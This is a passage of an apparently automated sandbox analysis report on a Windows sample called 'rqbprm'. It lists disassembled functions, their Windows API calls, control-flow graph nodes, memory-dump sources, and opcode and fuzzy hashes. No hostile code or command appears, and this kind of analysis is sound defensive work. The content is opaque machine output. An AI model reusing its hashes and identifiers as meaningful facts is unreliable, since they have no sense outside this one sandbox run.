                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 911178b7cf344b0319713faa20e60fcb4076b6471726afc04d40bf0bd6cabeb5
                                                                                              • Instruction ID: 0dcfcbe7e7f2ba7e84a6daa023290f7ebbd36ea9c17406419e66bc3c48d803a9
                                                                                              • Opcode Fuzzy Hash: 911178b7cf344b0319713faa20e60fcb4076b6471726afc04d40bf0bd6cabeb5
                                                                                              • Instruction Fuzzy Hash: F951F272600216AFFB25AE64CC41FBFB7AAEB40718F15462AFC14D6150EB30DD40D79A
                                                                                              Function 00C83B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 975 c83b72-c83b7c 976 c83bee-c83bf1 975->976 977 c83b7e-c83b8c 976->977 978 c83bf3 976->978 980 c83b8e-c83b91 977->980 981 c83b95-c83bb1 LoadLibraryExW 977->981 979 c83bf5-c83bf9 978->979 982 c83c09-c83c0b 980->982 983 c83b93 980->983 984 c83bfa-c83c00 981->984 985 c83bb3-c83bbc GetLastError 981->985 982->979 987 c83beb 983->987 984->982 986 c83c02-c83c03 FreeLibrary 984->986 988 c83bbe-c83bd3 call c86088 985->988 989 c83be6-c83be9 985->989 986->982 987->976 988->989 992 c83bd5-c83be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00C83C35,?,?,00CC2088,00000000,?,00C83D60,00000004,InitializeCriticalSectionEx,00C96394,InitializeCriticalSectionEx,00000000), ref: 00C83C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3664257935-2084034818
                                                                                              • Opcode ID: fe7e96b0c1888c2f3ce35c09b47063fabb09b27452b80fadb2e5d59c61b672fe
                                                                                              • Instruction ID: 2f062c96b2992ca2c09c2b3f6c1cb5f274bbf41b5e98b283b71d0212b6c4250c
                                                                                              • Opcode Fuzzy Hash: fe7e96b0c1888c2f3ce35c09b47063fabb09b27452b80fadb2e5d59c61b672fe
                                                                                              • Instruction Fuzzy Hash: 4F112971A056A1ABCF22AB689C45B6D37649F01F78F211221F821FB2D0E734EF0087D8
                                                                                              Function 00C698E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 993 c698e0-c69901 call c7ec50 996 c69903-c69906 993->996 997 c6990c 993->997 996->997 998 c69908-c6990a 996->998 999 c6990e-c6991f 997->999 998->999 1000 c69927-c69931 999->1000 1001 c69921 999->1001 1002 c69936-c69943 call c66edb 1000->1002 1003 c69933 1000->1003 1001->1000 1006 c69945 1002->1006 1007 c6994b-c6996a CreateFileW 1002->1007 1003->1002 1006->1007 1008 c6996c-c6998e GetLastError call c6bb03 1007->1008 1009 c699bb-c699bf 1007->1009 1013 c699c8-c699cd 1008->1013 1015 c69990-c699b3 CreateFileW GetLastError 1008->1015 1011 c699c3-c699c6 1009->1011 1011->1013 1014 c699d9-c699de 1011->1014 1013->1014 1016 c699cf 1013->1016 1017 c699e0-c699e3 1014->1017 1018 c699ff-c69a10 1014->1018 1015->1011 1021 c699b5-c699b9 1015->1021 1016->1014 1017->1018 1022 c699e5-c699f9 SetFileTime 1017->1022 1019 c69a12-c69a2a call c70602 1018->1019 1020 c69a2e-c69a39 1018->1020 1019->1020 1021->1011 1022->1018
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00C67760,?,00000005,?,00000011), ref: 00C6995F
                                                                                              • GetLastError.KERNEL32(?,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C6996C
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00C67760,?,00000005,?), ref: 00C699A2
                                                                                              • GetLastError.KERNEL32(?,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C699AA
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C699F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 7cf724e99e24df205007f9324f985c91899f6fed81f623d808cf7beecac5520a
                                                                                              • Instruction ID: 4f4f15176c9dbd542c455e2c566007e1663764cf8670cd3384a758c78fe9c1d6
                                                                                              • Opcode Fuzzy Hash: 7cf724e99e24df205007f9324f985c91899f6fed81f623d808cf7beecac5520a
                                                                                              • Instruction Fuzzy Hash: CA311530544785AFE7309B24CC85B9ABBD8FB04320F200B1DF9B9961D1D3B59A54CB95
                                                                                              Function 00C7B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1052 c7b568-c7b581 PeekMessageW 1053 c7b583-c7b597 GetMessageW 1052->1053 1054 c7b5bc-c7b5be 1052->1054 1055 c7b599-c7b5a6 IsDialogMessageW 1053->1055 1056 c7b5a8-c7b5b6 TranslateMessage DispatchMessageW 1053->1056 1055->1054 1055->1056 1056->1054
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
                                                                                              • IsDialogMessageW.USER32(00010414,?), ref: 00C7B59E
                                                                                              • TranslateMessage.USER32(?), ref: 00C7B5AC
                                                                                              • DispatchMessageW.USER32(?), ref: 00C7B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: ea49f1b3b8e706ed9052a56c246f9f8f3e7d6e3de9ac54d01770a1100e93a905
                                                                                              • Instruction ID: 801ccef3ff7073cd9888f00a71f045cc942c0f86fcec78edc4a46d4c76b0958e
                                                                                              • Opcode Fuzzy Hash: ea49f1b3b8e706ed9052a56c246f9f8f3e7d6e3de9ac54d01770a1100e93a905
                                                                                              • Instruction Fuzzy Hash: 96F07072A0115AAB8B20ABE6EC4CFDF7FBCEE057957408455F519D2050EB74DA05CBB0
                                                                                              Function 00C7ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1057 c7abab-c7abca GetClassNameW 1058 c7abf2-c7abf4 1057->1058 1059 c7abcc-c7abe1 call c71fbb 1057->1059 1060 c7abf6-c7abf9 SHAutoComplete 1058->1060 1061 c7abff-c7ac01 1058->1061 1064 c7abe3-c7abef FindWindowExW 1059->1064 1065 c7abf1 1059->1065 1060->1061 1064->1065 1065->1058
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00C7ABC2
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00C7ABF9
                                                                                                • Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00C7ABE9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: c35e4762cacc2a1d5ed75642b6aa6e487fe15442b9a4d2e160e3971b44fd2fc3
                                                                                              • Instruction ID: 18670bbea07f5c1b60e0b74907f07587b9cdeb5a2cca97305d3cf09db4433e4c
                                                                                              • Opcode Fuzzy Hash: c35e4762cacc2a1d5ed75642b6aa6e487fe15442b9a4d2e160e3971b44fd2fc3
                                                                                              • Instruction Fuzzy Hash: 31F0823360022877DB205764AC09F9F766C9B86B40F488011FA49A21C0D760EB4185B6
                                                                                              Function 00C7AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
                                                                                                • Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858
                                                                                              • OleInitialize.OLE32(00000000), ref: 00C7AC2F
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7AC66
                                                                                              • SHGetMalloc.SHELL32(00CA8438), ref: 00C7AC70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll
                                                                                              • API String ID: 3498096277-3360196438
                                                                                              • Opcode ID: 2f48919e5b16783bf913a964ad09a105c6af7b1c8cf10d9c3ac63cfc8445b7b3
                                                                                              • Instruction ID: 50bd7bcf900f84a944f2fae18a5350967be3ca0895d401093704b0ba33ebdbb0
                                                                                              • Opcode Fuzzy Hash: 2f48919e5b16783bf913a964ad09a105c6af7b1c8cf10d9c3ac63cfc8445b7b3
                                                                                              • Instruction Fuzzy Hash: 22F0F9B5900249ABCB10AFA9D849EEFFFFCEF85704F00816AE415A2241DBB456058BA1
                                                                                              Function 00C7DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1070 c7dbde-c7dc09 call c7ec50 SetEnvironmentVariableW call c70371 1074 c7dc0e-c7dc12 1070->1074 1075 c7dc36-c7dc38 1074->1075 1076 c7dc14-c7dc18 1074->1076 1077 c7dc21-c7dc28 call c7048d 1076->1077 1080 c7dc1a-c7dc20 1077->1080 1081 c7dc2a-c7dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C7DBF4
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C7DC30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: 51909117f5e441a812e115285e571af4ac71d2ef696b72ef9e9932fcec6d4d08
                                                                                              • Instruction ID: 396281f0145c348e39d9fa48edb16dfb19983bf8cec64ce8b388a2a97b5e6ce8
                                                                                              • Opcode Fuzzy Hash: 51909117f5e441a812e115285e571af4ac71d2ef696b72ef9e9932fcec6d4d08
                                                                                              • Instruction Fuzzy Hash: 2DF0ECB2504224A7DF221F958C0ABFE3B68BF04785F044451BD8E95165E7B08940D7B0
                                                                                              Function 00C69785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1082 c69785-c69791 1083 c69793-c6979b GetStdHandle 1082->1083 1084 c6979e-c697b5 ReadFile 1082->1084 1083->1084 1085 c697b7-c697c0 call c698bc 1084->1085 1086 c69811 1084->1086 1090 c697c2-c697ca 1085->1090 1091 c697d9-c697dd 1085->1091 1088 c69814-c69817 1086->1088 1090->1091 1092 c697cc 1090->1092 1093 c697ee-c697f2 1091->1093 1094 c697df-c697e8 GetLastError 1091->1094 1095 c697cd-c697d7 call c69785 1092->1095 1097 c697f4-c697fc 1093->1097 1098 c6980c-c6980f 1093->1098 1094->1093 1096 c697ea-c697ec 1094->1096 1095->1088 1096->1088 1097->1098 1099 c697fe-c69807 GetLastError 1097->1099 1098->1088 1099->1098 1101 c69809-c6980a 1099->1101 1101->1095
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00C69795
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00C697AD
                                                                                              • GetLastError.KERNEL32 ref: 00C697DF
                                                                                              • GetLastError.KERNEL32 ref: 00C697FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: 0111757426e18a2f01c6913941c3491c16f5dd0dac629c709f145db6f7ca89d3
                                                                                              • Instruction ID: 51cbad0186693299d2b98ddd9fc79535ad69eba3da2d5f66dce27e0afe8642ad
                                                                                              • Opcode Fuzzy Hash: 0111757426e18a2f01c6913941c3491c16f5dd0dac629c709f145db6f7ca89d3
                                                                                              • Instruction Fuzzy Hash: 68117C30910204EBDF305F65C888A6D37BDFB5A364F10892AE426861D0D7749F44DB61
                                                                                              Function 00C8AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C6D710,00000000,00000000,?,00C8ACDB,00C6D710,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue), ref: 00C8AD66
                                                                                              • GetLastError.KERNEL32(?,00C8ACDB,00C6D710,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue,00C97970,FlsSetValue,00000000,00000364,?,00C898B7), ref: 00C8AD72
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C8ACDB,00C6D710,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue,00C97970,FlsSetValue,00000000), ref: 00C8AD80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: a4a9b740d20f130c0e52e1d4d13734c367219481df12666831f8188df41488d6
                                                                                              • Instruction ID: f617b501f0424fabf083a6d80275a7b5164b69a4caa4d3e2273a3463a5c52ad8
                                                                                              • Opcode Fuzzy Hash: a4a9b740d20f130c0e52e1d4d13734c367219481df12666831f8188df41488d6
                                                                                              • Instruction Fuzzy Hash: 2E014736201632ABD7215B69DC48B5B7B98EF00BA67100623FD16D3550C720ED01C7E9
                                                                                              Function 00C69F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00C6D343,00000001,?,?,?,00000000,00C7551D,?,?,?), ref: 00C69F9E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00C7551D,?,?,?,?,?,00C74FC7,?), ref: 00C69FE5
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00C6D343,00000001,?,?), ref: 00C6A011
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: 59917e9831b7e8e0c5a7077a875f7126a9cc16acf6f29b6ae9f0ef4ec09f89f0
                                                                                              • Instruction ID: 9109b812ca69da02acd576cb4ede95a99b3597f5021fec42eee57c1e6940299c
                                                                                              • Opcode Fuzzy Hash: 59917e9831b7e8e0c5a7077a875f7126a9cc16acf6f29b6ae9f0ef4ec09f89f0
                                                                                              • Instruction Fuzzy Hash: 4731D331208345AFDB24CF20D898B6EB7A9FF85715F04051DF952A7290C775AE48CBA3
                                                                                              Function 00C6A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C6C27E: _wcslen.LIBCMT ref: 00C6C284
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A2D9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A30C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              • Opcode ID: 58f55e36c98172f6a91adad589154d2edd2febdbef3c563e86f15896b2151929
                                                                                              • Instruction ID: b637bfd43db3ebbbc84b9bd47217bbe4d4f37ca7eca2bfd1e2a0b7059f1a1cbe
                                                                                              • Opcode Fuzzy Hash: 58f55e36c98172f6a91adad589154d2edd2febdbef3c563e86f15896b2151929
                                                                                              • Instruction Fuzzy Hash: 8901D8351002106AEF31AB754CC9BFD3748AF09780F044425F912F61A1D754CB81DEB6
                                                                                              Function 00C8B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00C8B8B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: 692278f03b3a5f5c770e00ceed4c2a19239e5e5d03f9190d011add41bb14376c
                                                                                              • Instruction ID: f5411a5fdffebf6c9a28d8502701656c294bdbda3a2bc05107496781c355131c
                                                                                              • Opcode Fuzzy Hash: 692278f03b3a5f5c770e00ceed4c2a19239e5e5d03f9190d011add41bb14376c
                                                                                              • Instruction Fuzzy Hash: 5341277050428C9FDB219E25CC84BFABBBDEB05308F1404EDE59A86142D335AE46DF64
